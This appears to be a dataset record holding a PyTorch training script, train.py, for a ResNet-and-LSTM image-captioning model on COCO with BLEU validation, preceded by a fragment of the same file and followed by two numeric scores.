                    f.flush()
                    break
        print("\n")
        epoch_stats[epoch-1,2] = epoch_loss / total_step_val
        epoch_stats[epoch-1,3] = time() - epoch_time
        epoch_stats[epoch-1,4] = epoch_bleu1_score / total_step_val
        epoch_stats[epoch-1,5] = epoch_bleu2_score / total_step_val
        epoch_stats[epoch-1,6] = epoch_bleu3_score / total_step_val
        epoch_stats[epoch-1,7] = epoch_bleu4_score / total_step_val
        # Save the weights.
        if epoch % args.save_step == 0:
            torch.save(decoder.state_dict(), os.path.join(args.output_path, 'decoder-%d.pkl' % epoch))
            torch.save(encoder.state_dict(), os.path.join(args.output_path, 'encoder-%d.pkl' % epoch))
    tot_time = time() - start_time
    elapsed = "\n** Total Elapsed Runtime:" + strftime("%H:%M:%S", gmtime(tot_time))
    print(elapsed)
    f.write(elapsed + '\n')
    f.flush()
    # Close the training log file.
    f.close()
    np.savetxt(os.path.join(args.output_path,"stats.csv"), epoch_stats, delimiter=",")
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    # Positional: directory for checkpoints, logs and stats.
    parser.add_argument('output_path', type=str, nargs=1, help='path for saving trained model and output files')
    parser.add_argument('--vocab_threshold', type=int, default=5, help='minimum word count threshold (default 5)')
    parser.add_argument('--log_step', type=int , default=100, help='step size for printing log info (default 100)')
    parser.add_argument('--save_step', type=int , default=1, help='save trained models every N epoch (default 1)')
    # Model parameters
    parser.add_argument('--net', default='resnet50', const='resnet50', nargs='?', choices=['resnet50', 'resnet152'],
                        help='encoder pretrained network (default resnet50")')
    parser.add_argument('--embed_size', type=int , default=256, help='dimension of word embedding vectors (default 256)')
    parser.add_argument('--hidden_size', type=int , default=512, help='dimension of lstm hidden states (default 512)')
    parser.add_argument('--num_layers', type=int , default=1, help='number of layers in lstm (default 1)')
    parser.add_argument('--num_epochs', type=int, default=5, help='training epochs (default 5)')
    parser.add_argument('--batch_size', type=int, default=128, help='training batch size (default 128)')
    #parser.add_argument('--num_workers', type=int, default=2)
    parser.add_argument('--learning_rate', type=float, default=0.001, help='training learning rate (default 0.001)')
    parser.add_argument('--debug', action='store_true', help='enable debug mode (one batch train & validation)')
    args = parser.parse_args()
    # nargs=1 yields a one-element list; unwrap to a plain string.
    args.output_path = args.output_path[0]
    # Debug options
    if (args.debug == True):
        args.num_epochs = 1
        args.log_step = 10
    if not os.path.exists(args.output_path):
        os.makedirs(args.output_path)
    # Record the exact command line for reproducibility.
    with open(os.path.join(args.output_path,'commandline_args.txt'), 'w') as f:
        f.write('\n'.join(sys.argv[1:]))
    print(args)
main(args) | train.py | def warn(*args, **kwargs):
pass
import warnings
warnings.warn = warn
import torch
import torch.nn as nn
from torchvision import transforms
import sys
sys.path.append('/opt/cocoapi/PythonAPI')
from pycocotools.coco import COCO
from data_loader import get_loader
from data_loader_val import get_loader_val
from model import EncoderCNN, EncoderCNN152, DecoderRNN
import math
import torch.utils.data as data
import numpy as np
import os
import argparse
from nltk.translate.bleu_score import sentence_bleu
from time import time, gmtime, strftime
def clean_sentence(output, idx2word):
    """Convert a sequence of token ids into a readable caption string.

    Stops at '<end>', skips '<start>', attaches '.' without a leading
    space, and separates all other words with single spaces.
    """
    pieces = []
    for token_id in output:
        token = idx2word[token_id]
        if token == '<end>':
            break
        if token == '<start>':
            continue
        pieces.append(token if token == '.' else ' ' + token)
    return ''.join(pieces).strip()
def get_avg_bleu_score(outputs, references, idx2word, weights=(0.25, 0.25, 0.25, 0.25)):
    """Return the batch-average sentence-level BLEU score.

    outputs / references: parallel lists of token-id sequences.
    idx2word: vocabulary mapping id -> word.
    weights: n-gram weights forwarded to nltk's sentence_bleu.
    """
    # Guard: original raised ZeroDivisionError on an empty batch.
    if not outputs:
        return 0
    score = 0
    for predicted, target in zip(outputs, references):
        # Fix: sentence_bleu expects token lists, not raw strings — passing
        # strings (as the original did) computes character-level BLEU.
        hyp_tokens = clean_sentence(predicted, idx2word).split()
        ref_tokens = clean_sentence(target, idx2word).split()
        score += sentence_bleu([ref_tokens], hyp_tokens, weights)
    return score / len(outputs)
def main(args):
    """Train and validate the CNN-RNN image-captioning model.

    Runs ``args.num_epochs`` epochs, each with a full training pass and a
    validation pass (loss + BLEU-1..4), logs to <output_path>/training_log.txt,
    checkpoints encoder/decoder every ``args.save_step`` epochs, and writes
    per-epoch stats (train loss/time, val loss/time, BLEU-1..4) to stats.csv.
    """
    log_file = os.path.join(args.output_path, 'training_log.txt') # name of file with saved training loss and perplexity
    # Open the training log file.
    # NOTE(review): `f` is never closed if an exception escapes the training
    # loop — consider a `with` block or try/finally.
    f = open(log_file, 'w')
    f.write(str(args) + '\n')
    f.flush()
    #image transform below.
    transform_train = transforms.Compose([
        transforms.Resize(256),                          # smaller edge of image resized to 256
        transforms.RandomCrop(224),                      # get 224x224 crop from random location
        transforms.RandomHorizontalFlip(),               # horizontally flip image with probability=0.5
        transforms.ToTensor(),                           # convert the PIL Image to a tensor
        transforms.Normalize((0.485, 0.456, 0.406),      # normalize image for pre-trained model
                             (0.229, 0.224, 0.225))])
    #image transform below.
    # NOTE(review): validation uses RandomCrop, making validation metrics
    # non-deterministic — CenterCrop is the usual choice here; confirm intent.
    transform_val = transforms.Compose([
        transforms.Resize(256),                          # smaller edge of image resized to 256
        transforms.RandomCrop(224),                      # get 224x224 crop from random location
        transforms.ToTensor(),                           # convert the PIL Image to a tensor
        transforms.Normalize((0.485, 0.456, 0.406),      # normalize image for pre-trained model
                             (0.229, 0.224, 0.225))])
    # Build data loader.
    data_loader = get_loader(transform=transform_train,
                             mode='train',
                             batch_size=args.batch_size,
                             vocab_threshold=args.vocab_threshold,
                             vocab_from_file=False)
    data_loader_val = get_loader_val(transform=transform_val,
                                     batch_size=256)
    # The size of the vocabulary.
    vocab_size = len(data_loader.dataset.vocab)
    # Initialize the encoder and decoder.
    if (args.net == 'resnet50'):
        encoder = EncoderCNN(args.embed_size)
    elif (args.net == 'resnet152'):
        encoder = EncoderCNN152(args.embed_size)
    decoder = DecoderRNN(args.embed_size, args.hidden_size, vocab_size, num_layers= args.num_layers)
    # Move models to GPU if CUDA is available.
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    encoder.to(device)
    decoder.to(device)
    # Define the loss function.
    criterion = nn.CrossEntropyLoss().cuda() if torch.cuda.is_available() else nn.CrossEntropyLoss()
    # TODO #3: Specify the learnable parameters of the model.
    # Only the encoder's new embedding (and bn for resnet152) layers are
    # trained; the pretrained CNN backbone stays frozen.
    if (args.net == 'resnet50'):
        params = list(decoder.parameters()) + list(encoder.embed.parameters())
    elif (args.net == 'resnet152'):
        params = list(decoder.parameters()) + list(encoder.embed.parameters()) + list(encoder.bn.parameters())
    # TODO #4: Define the optimizer.
    optimizer = torch.optim.Adam(params, lr=args.learning_rate)
    # Set the total number of training steps per epoch.
    total_step = math.ceil(len(data_loader.dataset.caption_lengths) / data_loader.batch_sampler.batch_size)
    total_step_val = math.ceil(len(data_loader_val.dataset.caption_lengths) / data_loader_val.batch_sampler.batch_size)
    start_time = time()
    # Columns: 0 train loss, 1 train time, 2 val loss, 3 val time, 4-7 BLEU-1..4.
    epoch_stats = np.zeros((args.num_epochs, 8))
    for epoch in range(1, args.num_epochs+1):
        encoder.train()
        decoder.train()
        epoch_time = time()
        epoch_loss = 0
        for i_step in range(1, total_step+1):
            # Randomly sample a caption length, and sample indices with that length.
            indices = data_loader.dataset.get_train_indices()
            # Create and assign a batch sampler to retrieve a batch with the sampled indices.
            new_sampler = data.sampler.SubsetRandomSampler(indices=indices)
            data_loader.batch_sampler.sampler = new_sampler
            # Obtain the batch (fresh iterator on purpose: the sampler was just swapped).
            images, captions = next(iter(data_loader))
            # Move batch of images and captions to GPU if CUDA is available.
            images = images.to(device)
            captions = captions.to(device)
            # Zero the gradients.
            decoder.zero_grad()
            encoder.zero_grad()
            # Pass the inputs through the CNN-RNN model.
            features = encoder(images)
            outputs = decoder(features, captions)
            # Calculate the batch loss.
            loss = criterion(outputs.view(-1, vocab_size), captions.view(-1))
            epoch_loss += loss.item()
            # Backward pass.
            loss.backward()
            # Update the parameters in the optimizer.
            optimizer.step()
            # Get training statistics.
            stats = 'Epoch [%d/%d], Step [%d/%d], Loss: %.4f, Perplexity: %5.4f' % (epoch, args.num_epochs, i_step, total_step, loss.item(), np.exp(loss.item()))
            # Print training statistics (on same line).
            print('\r' + stats, end="")
            sys.stdout.flush()
            # Print training statistics to file (written every step).
            f.write(stats + '\n')
            f.flush()
            # Print training statistics (on different line).
            if i_step % args.log_step == 0:
                print('\r' + stats)
            # If debug option is enable, exit soon
            if (args.debug == True):
                break
        epoch_stats[epoch-1,0] = epoch_loss / total_step
        epoch_stats[epoch-1,1] = time() - epoch_time
        # Validation pass.
        encoder.eval()
        decoder.eval()
        epoch_time = time()
        epoch_loss = 0
        epoch_bleu1_score, epoch_bleu2_score, epoch_bleu3_score, epoch_bleu4_score = 0,0,0,0
        for i_step in range(1, total_step_val+1):
            # Randomly sample a caption length, and sample indices with that length.
            indices = data_loader_val.dataset.get_train_indices()
            # Create and assign a batch sampler to retrieve a batch with the sampled indices.
            new_sampler = data.sampler.SubsetRandomSampler(indices=indices)
            data_loader_val.batch_sampler.sampler = new_sampler
            # Obtain the batch.
            images, captions = next(iter(data_loader_val))
            # Move batch of images and captions to GPU if CUDA is available.
            images = images.to(device)
            captions = captions.to(device)
            # Pass the inputs through the CNN-RNN model.
            features = encoder(images)
            # Get predictions and output from decoder (to calculate LOSS)
            outputs = decoder(features, captions)
            predictions = decoder.sample(features, max_len = captions.shape[1])
            # Calculate the batch loss.
            outputs = outputs.to(device)
            loss = criterion(outputs.view(-1, vocab_size), captions.view(-1))
            epoch_loss += loss.item()
            # Get validation statistics (BLEU-1..4 via different n-gram weights).
            epoch_bleu1_score += get_avg_bleu_score(predictions, captions.tolist(),
                                                    data_loader_val.dataset.vocab.idx2word,
                                                    weights=(1, 0, 0, 0))
            epoch_bleu2_score += get_avg_bleu_score(predictions, captions.tolist(),
                                                    data_loader_val.dataset.vocab.idx2word,
                                                    weights=(0.5, 0.5, 0, 0))
            epoch_bleu3_score += get_avg_bleu_score(predictions, captions.tolist(),
                                                    data_loader_val.dataset.vocab.idx2word,
                                                    weights=(0.33, 0.33, 0.33, 0))
            epoch_bleu4_score += get_avg_bleu_score(predictions, captions.tolist(),
                                                    data_loader_val.dataset.vocab.idx2word)
            stats = 'Validation Epoch [%d/%d], Step [%d/%d], Loss: %.4f, BLEU-1/2/3/4: %.4f %.4f %.4f %.4f' % (epoch, args.num_epochs, i_step, total_step_val, loss.item(), epoch_bleu1_score/i_step, epoch_bleu2_score/i_step, epoch_bleu3_score/i_step, epoch_bleu4_score/i_step)
            # Print validation statistics (on same line).
            print('\r' + stats, end="")
            sys.stdout.flush()
            # Print validation statistics to file.
            if i_step == total_step_val:
                f.write(stats + '\n')
                f.flush()
            # If debug option is enabled, exit soon
            if i_step % args.log_step == 0:
                if (args.debug == True):
                    f.write(stats + '\n')
                    f.flush()
                    break
        print("\n")
        epoch_stats[epoch-1,2] = epoch_loss / total_step_val
        epoch_stats[epoch-1,3] = time() - epoch_time
        epoch_stats[epoch-1,4] = epoch_bleu1_score / total_step_val
        epoch_stats[epoch-1,5] = epoch_bleu2_score / total_step_val
        epoch_stats[epoch-1,6] = epoch_bleu3_score / total_step_val
        epoch_stats[epoch-1,7] = epoch_bleu4_score / total_step_val
        # Save the weights.
        if epoch % args.save_step == 0:
            torch.save(decoder.state_dict(), os.path.join(args.output_path, 'decoder-%d.pkl' % epoch))
            torch.save(encoder.state_dict(), os.path.join(args.output_path, 'encoder-%d.pkl' % epoch))
    tot_time = time() - start_time
    elapsed = "\n** Total Elapsed Runtime:" + strftime("%H:%M:%S", gmtime(tot_time))
    print(elapsed)
    f.write(elapsed + '\n')
    f.flush()
    # Close the training log file.
    f.close()
    np.savetxt(os.path.join(args.output_path,"stats.csv"), epoch_stats, delimiter=",")
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    # Positional: directory for checkpoints, logs and stats.
    parser.add_argument('output_path', type=str, nargs=1, help='path for saving trained model and output files')
    parser.add_argument('--vocab_threshold', type=int, default=5, help='minimum word count threshold (default 5)')
    parser.add_argument('--log_step', type=int , default=100, help='step size for printing log info (default 100)')
    parser.add_argument('--save_step', type=int , default=1, help='save trained models every N epoch (default 1)')
    # Model parameters
    parser.add_argument('--net', default='resnet50', const='resnet50', nargs='?', choices=['resnet50', 'resnet152'],
                        help='encoder pretrained network (default resnet50")')
    parser.add_argument('--embed_size', type=int , default=256, help='dimension of word embedding vectors (default 256)')
    parser.add_argument('--hidden_size', type=int , default=512, help='dimension of lstm hidden states (default 512)')
    parser.add_argument('--num_layers', type=int , default=1, help='number of layers in lstm (default 1)')
    parser.add_argument('--num_epochs', type=int, default=5, help='training epochs (default 5)')
    parser.add_argument('--batch_size', type=int, default=128, help='training batch size (default 128)')
    #parser.add_argument('--num_workers', type=int, default=2)
    parser.add_argument('--learning_rate', type=float, default=0.001, help='training learning rate (default 0.001)')
    parser.add_argument('--debug', action='store_true', help='enable debug mode (one batch train & validation)')
    args = parser.parse_args()
    # nargs=1 yields a one-element list; unwrap to a plain string.
    args.output_path = args.output_path[0]
    # Debug options
    if (args.debug == True):
        args.num_epochs = 1
        args.log_step = 10
    if not os.path.exists(args.output_path):
        os.makedirs(args.output_path)
    # Record the exact command line for reproducibility.
    with open(os.path.join(args.output_path,'commandline_args.txt'), 'w') as f:
        f.write('\n'.join(sys.argv[1:]))
    print(args)
main(args) | 0.616936 | 0.423875 |